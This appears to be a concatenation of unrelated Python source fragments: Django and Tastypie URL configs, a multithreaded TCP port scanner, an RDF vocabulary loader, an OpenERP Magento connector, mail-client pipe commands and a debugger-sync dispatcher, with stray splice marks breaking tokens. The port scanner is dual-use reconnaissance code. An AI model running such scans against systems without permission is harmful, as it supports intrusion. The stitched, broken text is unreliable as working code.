api.register(SimplePlaylistResource())
api.register(PlaylistResource())
api.register(PlaylistItemPlaylistResource())
# importer
api.register(ImportResource())
api. | register(ImportFileResource())
# exporter
api.register(ExportResource())
api.register(ExportItemResource())
# abcast
api.register(AbcastBaseResource())
api.register(StationResource())
api.register(ChannelResource())
api.register(JingleResource())
api.register(JingleSetResource())
### scheduler
api.register(EmissionResource())
# comment
api.register(CommentResource())
# server stats
api.register(StatsResource())
"""
urlpatterns = patterns('',
(r'^', include(api.urls)),
)
""" |
import socket
import sys
import threading
try:
from Queue import Queue, Empty
except:
from queue import Queue, Empty
from collections import OrderedDict
from . import parseintset
DEFAULT_THREAD_LIMIT = 200
CLOSED_STATUS = 'closed'
OPEN_STATUS = 'open'
if sys.version_info.major >= 3:
unicode = str
class Scanner(threading.Thread):
def __init__(self, input_queue, output_queue, timeout=5):
threading.Thread.__init__(self)
# These are the scan queues
self.input_queue = input_queue
self.output_queue = output_queue
self.keep_running = True
self.timeout = timeout
def run(self):
# This loop will exit when the input_queue generates an exception because all of the threads
# are complete
while self.keep_running:
try:
host, port = self.input_queue.get(timeout=5)
except Empty:
continue
# Make the socket for performing the scan
sock_instance = socke | t.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_instance.settimeout(self.timeout)
try:
# Connect to the host via TCP
sock_instance.connect((host, port))
except socket.error:
# Note that it is in the closed state
self.output_queue.put((host, port, CLOSED_STATUS))
else:
# Not | e that it is in the open state
self.output_queue.put((host, port, OPEN_STATUS))
sock_instance.close()
self.input_queue.task_done()
self.output_queue.task_done()
def stop_running(self):
self.keep_running = False
def port_scan(host, ports, thread_count=DEFAULT_THREAD_LIMIT, callback=None, timeout=5):
# Parse the ports if necessary
if isinstance(ports, (str, unicode)):
parsed_ports = parseintset.parseIntSet(ports)
else:
parsed_ports = ports
# Setup the queues
to_scan = Queue()
scanned = Queue()
# Prepare the scanners
# These scanners will monitor the input queue for new things to scan, scan them, and them put
# them in the output queue
scanners = [Scanner(to_scan, scanned, timeout) for i in range(min(thread_count,len(ports)))]
for scanner in scanners:
scanner.start()
# Create the list of host ports to scan
host_ports = [(host, port) for port in parsed_ports]
for host_port in host_ports:
to_scan.put(host_port)
# This will store the list of successfully executed host/port combiations
results = {}
# This will contain the resulting data
data = []
for host, port in host_ports:
while (host, port) not in results:
# Get the queued thread: this will block if necessary
scanned_host, scanned_port, scan_status = scanned.get()
# Log that that we performed the scan
results[(scanned_host, scanned_port)] = scan_status
# Append the data
data.append(OrderedDict({
'dest' : scanned_host,
'port' : 'TCP\\' + str(scanned_port),
'status': scan_status
}))
# Run the callback if one is present
if callback is not None:
callback(scanned_host, scanned_port, scan_status)
# Stop the threads
for scanner in scanners:
scanner.stop_running()
return data
|
"""
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
This file is part of the Smart Developer Hub Project:
http://www.smartdeveloperhub.org
Center for Open Middleware
http://www.centeropenmiddleware.com/
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Copyright (C) 2015 Center for Open Middleware.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
"" | "
import StringIO
import urlparse
from rdflib import Graph, RDF
from rdflib.namespace import OWL
from rdflib.plugins.parsers.notation3 import BadSyntax
import agora.fountain.vocab.schema as sch
__author__ = 'Fernando Serena'
class VocabularyException(Exception):
pass
class DuplicateVocabulary(VocabularyException):
pass
class Vocabular | yNotFound(VocabularyException):
pass
class UnknownVocabulary(VocabularyException):
pass
def __load_owl(owl):
"""
:param owl:
:return:
"""
owl_g = Graph()
for f in ['turtle', 'xml']:
try:
owl_g.parse(source=StringIO.StringIO(owl), format=f)
break
except SyntaxError:
pass
if not len(owl_g):
raise VocabularyException()
try:
uri = list(owl_g.subjects(RDF.type, OWL.Ontology)).pop()
vid = [p for (p, u) in owl_g.namespaces() if uri in u and p != '']
imports = owl_g.objects(uri, OWL.imports)
if not len(vid):
vid = urlparse.urlparse(uri).path.split('/')[-1]
else:
vid = vid.pop()
return vid, uri, owl_g, imports
except IndexError:
raise VocabularyNotFound()
def add_vocabulary(owl):
"""
:param owl:
:return:
"""
vid, uri, owl_g, imports = __load_owl(owl)
if vid in sch.contexts():
raise DuplicateVocabulary('Vocabulary already contained')
sch.add_context(vid, owl_g)
vids = [vid]
# TODO: Import referenced ontologies
for im_uri in imports:
print im_uri
im_g = Graph()
try:
im_g.load(im_uri, format='turtle')
except BadSyntax:
try:
im_g.load(im_uri)
except BadSyntax:
print 'bad syntax in {}'.format(im_uri)
try:
child_vids = add_vocabulary(im_g.serialize(format='turtle'))
vids.extend(child_vids)
except DuplicateVocabulary, e:
print 'already added'
except VocabularyNotFound, e:
print 'uri not found for {}'.format(im_uri)
except Exception, e:
print e.message
return vids
def update_vocabulary(vid, owl):
"""
:param vid:
:param owl:
:return:
"""
owl_vid, uri, owl_g, imports = __load_owl(owl)
if vid != owl_vid:
raise Exception("Identifiers don't match")
if vid not in sch.contexts():
raise UnknownVocabulary('Vocabulary id is not known')
sch.update_context(vid, owl_g)
def delete_vocabulary(vid):
"""
:param vid:
:return:
"""
if vid not in sch.contexts():
raise UnknownVocabulary('Vocabulary id is not known')
sch.remove_context(vid)
def get_vocabularies():
"""
:return:
"""
return sch.contexts()
def get_vocabulary(vid):
"""
:param vid:
:return:
"""
return sch.get_context(vid).serialize(format='turtle')
|
medelta
from openerp.osv import fields, orm
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
from openerp.tools.translate import _
from openerp.addons.connector.session import ConnectorSession
from openerp.addons.connector.connector import ConnectorUnit
from openerp.addons.connector.unit.mapper import (mapping,
only_create,
ImportMapper
)
from .unit.backend_adapter import GenericAdapter
from .unit.import_synchronizer import (import_batch,
DirectBatchImport,
MagentoImportSynchronizer,
AddCheckpoint,
)
from .partner import partner_import_batch
from .sale import sale_order_import_batch
from .backend import magento
from .connector import add_checkpoint
_logger = logging.getLogger(__name__)
IMPORT_DELTA_BUFFER = 30 # seconds
class magento_backend(orm.Model):
_name = 'magento.backend'
_description = 'Magento Backend'
_inherit = 'connector.backend'
_backend_type = 'magento'
def select_versions(self, cr, uid, context=None):
""" Available versions in the backend.
Can be inherited to add custom versions. Using this method
to add a version from an ``_inherit`` does not constrain
to redefine the ``version`` field in the ``_inherit`` model.
"""
return [('1.7', '1.7')]
def _select_versions(self, cr, uid, context=None):
""" Available versions in the backend.
If you want to add a version, do not override this
method, but ``select_version``.
"""
return self.select_versions(cr, uid, context=context)
def _get_stock_field_id(self, cr, uid, context=None):
field_ids = self.pool.get('ir.model.fields').search(
cr, uid,
[('model', '=', 'product.product'),
('name', '=', 'virtual_available')],
context=context)
return field_ids[0]
_columns = {
'version': fields.selection(
_select_versions,
string='Version',
required=True),
'location': fields.char(
'Location',
required=True,
help="Url to magento application"),
'admin_location': fields.char('Admin Location'),
'use_custom_api_path': fields.boolean(
'Custom Api Path',
help="The default API path is '/index.php/api/xmlrpc'. "
"Check this box if you use a custom API path, in that case, "
"the location has to be completed with the custom API path "),
'username': fields.char(
'Username',
help="Webservice user"),
'password': fields.char(
'Password',
help="Webservice password"),
'use_auth_basic': fields.boolean(
'Use HTTP Auth Basic',
help="Use a Basic Access Authentication for the API. "
"The Magento server could be configured to restrict access "
"using a HTTP authentication based on a username and "
"a password."),
'auth_basic_username': fields.char(
'Basic Auth. Username',
help="Basic access authentication web server side username"),
'auth_basic_password': fields.char(
'Basic Auth. Password',
help="Basic access authentication web server side password"),
'sale_prefix': fields.char(
'Sale Prefix',
help="A prefix put before the name of imported sales orders.\n"
"For instance, if the prefix is 'mag-', the sales "
"order 100000692 in Magento, will be named 'mag-100000692' "
"in OpenERP."),
'warehouse_id': fields.many2one('stock.warehouse',
'Warehouse',
required=True,
help='Warehouse used to compute the '
'stock quantities.'),
'website_ids': fields.one2many(
'magento.website', 'backend_id',
string='Website', readonly=True),
'default_lang_id': fields.many2one(
'res.lang',
'Default Language',
help="If a default language is selected, the records "
"will be imported in the translation of this language.\n"
"Note that a similar configuration exists "
"for each storeview."),
'default_category_id': fields.many2one(
'product.category',
string='Default Product Category',
help='If a default category is selected, products imported '
'without a category will be linked to it.'),
# add a field `auto_activate` -> activate a cron
'import_products_from_date': fields.datetime(
'Import products from date'),
'import_categories_from_date': fields.datetime(
'Import categories from date'),
'catalog_price_tax_included': fields.boolean('Prices include tax'),
'product_stock_field_id': fields.many2one(
'ir.model.fields',
string='Stock Field',
domain="[('model', 'in', ['product.product', 'product.template']),"
" ('ttype', '=', 'float')]",
help="Choose the field of the product which will be used for "
"stock inventory updates.\nIf empty, Quantity Available "
"is used."),
'product_binding_ids': fields.one2many('magento.product.product',
'backend_id',
string='Magento Products',
readonly=True),
}
_defaults = {
'product_stock_field_id': _get_stock_field_id,
'use_custom_api_path': False,
'use_auth_basic': False,
}
_sql_constraints = [
('sale_prefix_uniq', 'unique(sale_prefix)',
"A backend with the same sale prefix already exists")
]
def check_magento_structure(self, cr, uid, ids, context=None):
""" Used in each data import.
Verify if a website exists for each backend before starting the import.
"""
for backend_id in ids:
website_ids = self.pool[' | magento.website'].search(
cr, uid, [('backend_id', '=', backend_id)], context=context)
if not website_ids:
self.synchronize_metadata(cr, uid, backend_id, context=context)
return True
def synchronize_metadata(self, cr, uid, ids, context=None):
if not hasattr(ids, '__iter__'):
ids = [ids]
session = ConnectorSession(cr, uid, context=context)
for backend_id in ids:
for model in ('magento.we | bsite',
'magento.store',
'magento.storeview'):
# import directly, do not delay because this
# is a fast operation, a direct return is fine
# and it is simpler to import them sequentially
import_batch(session, model, backend_id)
return True
def import_partners(self, cr, uid, ids, context=None):
""" Import partners from all websites """
if not hasattr(ids, '__iter__'):
ids = [ids]
self.check_magento_structure(cr, uid, ids, context=context)
for backend in self.browse(cr, uid, ids, context=context):
for website in backend.website_ids:
website.import_partners()
return True
def import_sale_orders(self, cr, uid, ids, context=None):
""" Import sale orders from all store views """
if not hasattr(ids, '__iter__'):
ids = [ids]
storeview_obj = self.pool.get('magento.storeview')
storeview_ids = storeview_obj.search(cr, uid,
|
"""
OnionShare | https://onionshare.org/
Copyright (C) 2014 Micah Lee <micah@micahflee.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is dis | tributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see | <http://www.gnu.org/licenses/>.
"""
from onionshare import web
from nose import with_setup
def test_generate_slug_length():
"""generates a 26-character slug"""
assert len(web.slug) == 26
def test_generate_slug_characters():
"""generates a base32-encoded slug"""
def is_b32(string):
b32_alphabet = "01234556789abcdefghijklmnopqrstuvwxyz"
return all(char in b32_alphabet for char in string)
assert is_b32(web.slug)
|
import sys
from os.path import join, abspath, dirname
# PATH vars
here = lambda *x: join(abspath(dirname(__file__)), *x)
PROJECT_ROOT = here("..")
root = lambda *x: join(abspath(PROJECT_ROOT), *x)
sys.path.insert(0, root('apps'))
ADMINS = (
('Maxime Lapointe', 'maxx@themaxx.ca'),
)
MANAGERS = ADMINS
SHELL_PLUS = 'ipython'
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'CHANGE THIS!!!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ALLOWED_HOSTS = []
# Application defin | ition
INSTALLED_APPS = (
'django_admin_bootstrapped',
'django.contrib.admin',
'django.contrib.auth',
'djang | o.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'www',
)
PROJECT_APPS = ()
INSTALLED_APPS += PROJECT_APPS
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'lapare.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'lapare.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '../www_lapare_ca.db',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'fr-CA'
TIME_ZONE = 'America/Montreal'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = root('assets', 'uploads')
MEDIA_URL = '/media/'
# Additional locations of static files
STATICFILES_DIRS = (
root('assets'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
STATICFILES_STORAGE = ('django.contrib.staticfiles.storage.'
'ManifestStaticFilesStorage')
TEMPLATE_DIRS = (
root('templates'),
)
# .local.py overrides all the common settings.
try:
from .local import *
except ImportError:
from .production import *
# importing test settings file if necessary
if len(sys.argv) > 1 and 'test' in sys.argv[1]:
from .testing import *
|
command to open
:type cmd: str or list of str
:param all: pipe all, not only selected message
:type all: bool
:param separately: call command once per message
:type separately: bool
:param background: do not suspend the interface
:type background: bool
:param notify_stdout: display command\'s stdout as notification message
:type notify_stdout: bool
:param shell: let the shell interpret the command
:type shell: bool
'raw': message content as is,
'decoded': message content, decoded quoted printable,
'id': message ids, separated by newlines,
'filepath': paths to message files on disk
:type format: str
:param add_tags: add 'Tags' header to the message
:type add_tags: bool
:param noop_msg: error notification to show if `cmd` is empty
:type noop_msg: str
:param confirm_msg: confirmation question to ask (continues directly if
unset)
:type confirm_msg: str
:param done_msg: notification message to show upon success
:type done_msg: str
"""
Command.__init__(self, **kwargs)
if isinstance(cmd, unicode):
cmd = split_commandstring(cmd)
self.cmd = cmd
self.whole_thread = all
self.separately = separately
self.background = background
self.shell = shell
self.notify_stdout = notify_stdout
self.output_format = format
self.add_tags = add_tags
self.noop_msg = noop_msg
self.confirm_msg = confirm_msg
self.done_msg = done_msg
@inlineCallbacks
def apply(self, ui):
# abort if command unset
if not self.cmd:
ui.notify(self.noop_msg, priority='error')
return
# get messages to pipe
if self.whole_thread:
thread = ui.current_buffer.get_selected_thread()
if not thread:
return
to_print = thread.get_messages().keys()
else:
to_print = [ui.current_buffer.get_selected_message()]
# ask for confirmation if needed
if self.confirm_msg:
if (yield ui.choice(self.confirm_msg, select='yes',
cancel='no')) == 'no':
return
# prepare message sources
pipestrings = []
separator = '\n\n'
logging.debug('PIPETO format')
logging.debug(self.output_format)
if self.output_format == 'id':
pipestrings = [e.get_message_id() for e in to_print]
separator = '\n'
elif self.output_format == 'filepath':
pipestrings = [e.get_filename() for e in to_print]
separator = '\n'
else:
for msg in to_print:
mail = msg.get_email()
if self.add_tags:
mail['Tags'] = encode_header('Tags',
', '.join(msg.get_tags()))
if self.output_format == 'raw':
pipestrings.append(mail.as_string())
elif self.output_format == 'decoded':
headertext = extract_headers(mail)
bodytext = extract_body(mail)
msgtext = '%s\n\n%s' % (headertext, bodytext)
pipestrings.append(msgtext.encode('utf-8'))
if not self.separately:
pipestrings = [separator.join(pipestrings)]
if self.shell:
self.cmd = [' '.join(self.cmd)]
# do teh monkey
for mail in pipestrings:
if self.background:
logging.debug('call in background: %s' % str(self.cmd))
proc = subprocess.Popen(self.cmd,
shell=True, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate(mail)
if self.notify_stdout:
ui.notify(out)
else:
logging.debug('stop urwid screen')
ui.mainloop.screen.stop()
logging.debug('call: %s' % str(self.cmd))
# if proc.stdout is defined later calls to communicate
# seem to be non-blocking!
proc = subprocess.Popen(self.cmd, shell=True,
stdin=subprocess.PIPE,
# stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate(mail)
logging.debug('start urwid screen')
ui.mainloop.screen.start()
if err:
ui.notify(err, priority='error')
return
# display 'done' message
if self.done_msg:
ui.notify(self.done_msg)
@registerCommand(MODE, 'remove', arguments=[
(['--all'], {'action': 'store_true', 'help': 'remove whole thread'})])
class RemoveCommand(Command):
"""remove message(s) from the index"""
repeatable = True
def __init__(self, all=False, **kwargs):
"""
:param all: remove all messages from thread, not just selected one
:type all: bool
"""
Command.__init__(self, **kwargs)
self.all = all
@inlineCallbacks
def apply(self, ui):
threadbuffer = ui.current_buffer
# get messages and notification strings
if self.all:
thread = threadbuffer.get_selected_thread()
tid = thread.get_thread_id()
messages = thread.get_messages().keys()
confirm_msg = 'remove all messages in thread?'
ok_msg = 'removed all messages in thread: %s' % tid
else:
msg = threadbuffer.get_selected_message()
messages = [msg]
confirm_msg = 'remove selected message?'
ok_msg = 'removed message: %s' % msg.get_message_id()
# ask for confirmation
if (yield ui.choice(confirm_msg, select='yes', cancel='no')) == 'no':
return
# notify callback
def callback():
threadbuffer.rebuild()
ui.notify(ok_msg)
# remove messages
for m in messages:
ui.dbman.remove_message(m, afterwards=callback)
ui.apply_command(FlushCommand())
@registerCommand(MODE, 'print', arguments=[
| (['--all'], {'action': 'store_true', 'help': 'print all messages'}),
(['--raw'], {'action': 'store_true', 'help': 'pass raw mail string'}),
(['--separately'], {'action': | 'store_true',
'help': 'call print command once for each message'}),
(['--add_tags'], {'action': 'store_true',
'help': 'add \'Tags\' header to the message'}),
],
)
class PrintCommand(PipeCommand):
"""print message(s)"""
repeatable = True
def __init__(self, all=False, separately=False, raw=False, add_tags=False,
**kwargs):
"""
:param all: print all, not only selected messages
:type all: bool
:param separately: call print command once per message
:type separately: bool
:param raw: pipe raw message string to print command
:type raw: bool
:param add_tags: add 'Tags' header to the message
:type add_tags: bool
"""
# get print command
cmd = settings.get('print_cmd') or ''
# set up notification strings
if all:
confirm_msg = 'print all messages in thread?'
ok_msg = 'printed thread using %s' % cmd
else:
confirm_msg = 'print selected message?'
ok_msg = 'printed message using %s' % cmd
# no print cmd set
noop_msg = 'no print command specified. Set "print_cmd" in the '\
'global section.'
PipeCommand.__init__(self, [cmd], all=all, separately=separately,
back |
# -*- coding: utf-8 -*-
#
# This file is part of Karesansui.
#
# Copyright (C) 2009-2012 HDE, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial porti | ons of the | Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import web
from karesansui.lib.rest import Rest, auth
from karesansui.lib.checker import Checker, \
CHECK_EMPTY, CHECK_VALID, CHECK_LENGTH, CHECK_CHAR
from karesansui.lib.utils import is_param, json_dumps
from karesansui.db.access.tag import findbyhost1guestall
class GuestTag(Rest):
@auth
def _GET(self, *param, **params):
host_id = self.chk_hostby1(param)
if host_id is None: return web.notfound()
tags = findbyhost1guestall(self.orm, host_id)
if not tags:
self.logger.debug("No tags is found.")
return web.notfound()
if self.is_part() is True:
self.view.tags = tags
machine_ids = {}
for tag in tags:
tag_id = str(tag.id)
machine_ids[tag_id] = []
for machine in tag.machine:
if not machine.is_deleted:
machine_ids[tag_id].append("tag_machine%s"% machine.id)
machine_ids[tag_id] = " ".join(machine_ids[tag_id])
self.view.machine_ids = machine_ids
return True
elif self.is_json() is True:
tags_json = []
for tag in tags:
tags_json.append(tag.get_json(self.me.languages))
self.view.tags = json_dumps(tags_json)
return True
else:
return web.nomethod()
urls = (
'/host/(\d+)/guest/tag/?(\.part|\.json)$', GuestTag,
)
|
# Copyright The IETF Trust 2008, All Rights Reserved
from django.conf.urls.defaults import patterns, include
from ietf.wginfo import views, edit, milestones
from django.views.generic.simple import redirect_to
urlpatterns = patterns('',
(r'^$', views.wg_dir),
(r'^summary.txt', redirect_to, { 'url':'/wg/1wg-summary.txt' }),
(r'^summary-by-area.txt', redirect_to, { 'url':'/wg/1wg-summary.txt' }),
(r'^summary-by-acronym.txt', redirect_to, { 'url':'/wg/1wg-summary-by-acronym.txt' }),
(r'^1wg-summary.txt', views.wg_summary_area),
(r'^1wg-summary-by-acronym.txt', views.wg_summary_acronym),
(r'^1wg-charters.txt', views.wg_charters),
(r'^1wg-charters-by-acronym.txt', views.wg_charters_by_acronym),
(r'^chartering/$', views.chartering_wgs),
(r'^bofs/$', views.bofs),
(r'^chartering/create/$', edit.edit, {'action': "charter"}, "wg_create"),
(r'^bofs/create/$', edit.edit, {'action': "create"}, "bof_create"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/documents/txt/$', views.wg_documents_txt),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/$', views.wg_documents_html, None, "wg_docs"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/charter/$', views.wg_charter, None, 'wg_charter'),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/init-charter/', edit.submit_initial_charter, None, "wg_init_charter"),
(r'^ | (?P<acronym>[a-zA-Z0-9-]+)/history/$', views.history),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/edit/$', edit.edit, {'action': "edit"}, "wg_edit"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/conclude/$', edit.conclude, None, "wg_conclude"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/milestones/$', milestones.edit_milestones, {'milestone_set': "current"}, "wg_edit_milestones"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/milestones/charter/$', mil | estones.edit_milestones, {'milestone_set': "charter"}, "wg_edit_charter_milestones"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/milestones/charter/reset/$', milestones.reset_charter_milestones, None, "wg_reset_charter_milestones"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/ajax/searchdocs/$', milestones.ajax_search_docs, None, "wg_ajax_search_docs"),
(r'^(?P<acronym>[^/]+)/management/', include('ietf.wgchairs.urls')),
)
|
"""Admin API urls."""
from rest_framework import routers
from . import viewsets
router = routers.SimpleRoute | r()
router.register(r"domains", viewsets.DomainViewSet, basename="domain")
router.register(
r"domainaliases", viewsets.DomainAliasViewSet, basename="domain_alias")
router.register(r"accounts", viewsets.AccountViewSet, basename="account")
router.register(r"aliases", viewsets.AliasViewSet, basename="alias")
router.register(
r"senderaddresses", viewsets.SenderAddressViewSet, basename="sender_address")
urlpatterns = router. | urls
|
= True
self.pat = re.compile('dbg disconnected')
self.req_handlers = {
'new_client': self.req_new_client,
'new_dbg': self.req_new_dbg,
'dbg_quit': self.req_dbg_quit,
'idb_n': self.req_idb_n,
'idb_list': self.req_idb_list,
'module': self.req_module,
'sync_mode': self.req_sync_mode,
'cmd': self.req_cmd,
'bc': self.req_bc,
'kill': self.req_kill
}
def bind(self, host, port):
self.dbg_srv_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.dbg_srv_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.dbg_srv_sock.bind((host, port))
self.srv_socks.append(self.dbg_srv_sock)
if not (socket.gethostbyname(host) == '127.0.0.1'):
self.localhost_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.localhost_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.localhost_sock.bind(('localhost', port))
self.srv_socks.append(self.localhost_sock)
def accept(self, s):
new_socket, addr = s.accept()
self.opened_socks.append(new_socket)
def listen(self):
for s in self.srv_socks:
s.listen(5)
def close(self, s):
s.close()
self.opened_socks.remove(s)
def loop(self):
self.listen()
self.announcement("dispatcher listening")
while True:
rlist, wlist, xlist = select.select(self.srv_socks + self.opened_socks, [], [])
if not rlist:
self.announcement("socket error: select")
raise Exception("rabbit eating the cable")
for s in rlist:
if s in self.srv_socks:
self.accept(s)
else:
self.handle(s)
def handle(self, s):
client = self.sock_to_client(s)
for req in self.recvall(client):
self.parse_exec(s, req)
# find client object for its srv socket
def sock_to_client(self, s):
if self.current_dbg and (s == self.current_dbg.srv_sock):
client = self.current_dbg
else:
clist = [client for client in self.idb_clients if (client.srv_sock == s)]
if not clist:
client = Client(None, s, None)
self.idb_clients.append(client)
else:
client = clist[0]
return client
# buffered readline like function
def recvall(self, client):
try:
data = client.srv_sock.recv(4096)
if data == '':
raise
except:
if client == self.current_dbg:
self.broadcast("debugger closed the connection")
self.dbg_quit()
else:
self.client_quit(client.srv_sock)
self.broadcast("a client quit, nb client(s) left: %d" % len(self.idb_clients))
return []
return client.feed(data)
# parse and execute requests from clients (idbs or dbg)
def parse_exec(self, s, req):
if not (req[0:8] == '[notice]'):
# this is a normal [sync] request from debugger, forward it
self.forward(req)
# receive 'dbg disconnected', socket can be closed
if re.search(self.pat, req):
self.close(s)
return
req = self.normalize(req, 8)
try:
hash = json.loads(req)
except:
print "[-] dispatcher failed to parse json\n %s\n" % req
return
type = hash['type']
if not type in self.req_handlers:
print ("[*] dispatcher unknown request: %s" % type)
return
req_handler = self.req_handlers[type]
req_handler(s, hash)
def normalize(self, req, taglen):
req = req[taglen:]
req = req.replace("\\", "\\\\")
req = req.replace("\n", "")
return req
def puts(self, msg, s):
s.sendall(msg)
# dispatcher announcements are forwarded to the idb
def announcement(self, msg, s=None):
if not s:
if not self.current_idb:
return
s = self.current_idb.client_sock
try:
s.sendall("[notice]{\"type\":\"dispatcher\",\"subtype\":\"msg\",\"msg\":\"%s\"}\n" % msg)
except:
return
# send message to all connected idb clients
def broadcast(self, msg):
for idbc in self.idb_clients:
self.announcement(msg, idbc.client_sock)
# send dbg message to currently active idb client
def forward(self, msg, s=None):
if not s:
if not self.current_idb:
return
s = self.current_idb.client_sock
if s:
s.sendall(msg + "\n")
# send dbg message to all idb clients
def forward_all(self, msg, s=None):
for idbc in self.idb_clients:
self.forward(msg, idbc.client_sock)
# disable current idb and enable new idb matched from current module name
def switch_idb(self, new_idb):
msg = "[sync]{\"type\":\"broker\",\"subtype\":\"%s\"}\n"
if (not self.current_idb == new_idb) & (self.current_idb.enabled):
self.current_idb.client_sock.sendall(msg % "disable_idb")
self.current_idb.enabled = False
if new_idb:
new_idb.client_sock.sendall(msg % "enable_idb")
self.current_idb = new_idb
new_idb.enabled = True
# a new idb client connects to the dispatcher via its broker
def req_new_client(self, srv_sock, hash):
port, name = hash['port'], hash['idb']
try:
client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_sock.connect(('localhost', port))
self.opened_socks.append(client_sock)
except:
self.opened_socks.remove(srv_sock)
srv_sock.close()
return
# check if an idb client is already registered with the same name
conflicting = [client for client in self.idb_clients if (client.name == name)]
# promote to idb client
new_client = self.sock_to_client(srv_sock)
new_client.client_sock = client_sock
new_client.name = name
self.broadcast("add new client (listening on port %d), nb client(s): %d" % (port, len(self.idb_clients)))
if conflicting:
self.broadcast("conflicting name: %s !" % new_client.name)
if not self.current_idb:
self.current_idb = new_client
# if new client match current module name, then enable it
if self.current_module == name:
self.switch_idb(new_client)
# inform new client about debugger's dialect
self.dbg_dialect(new_client)
# clean state when a client is quiting
def client_quit(self, s):
self.opened_socks.remove(s)
# remove exiting client from the list of active clients
for idbc in [idbc for idbc in self.idb_clients if (idbc.srv_sock == s)]:
self.idb_clients.remove(idbc)
self.opened_socks.remove(idbc.client_sock)
idbc.close()
# no more clients, let's kill ourself
| if not self.idb_clients:
for s in self.srv_socks:
s.close()
sys.exit()
# a new debugger client connects to the dispatcher
def req_new_dbg(self, s, hash):
msg = hash['msg']
if self.current_dbg:
self.dbg_quit()
# promote to dbg client
self.current_dbg = self.sock_to_client(s)
self | .current_dbg.client_sock = s
self.idb_clients.remove(self.current_dbg)
self.broadcast("new debugger client: %s" % msg)
# store dbb's dialect
if 'dialect' in hash:
self.current_dialect = hash['dialect']
self.dbg_dialect()
# inform client about debugger's dialect
def dbg_dialect(self, client=None):
msg = "[sync]{\"type\":\"dialect\",\"dialect\":\"%s\"}\n" % self.current_d |
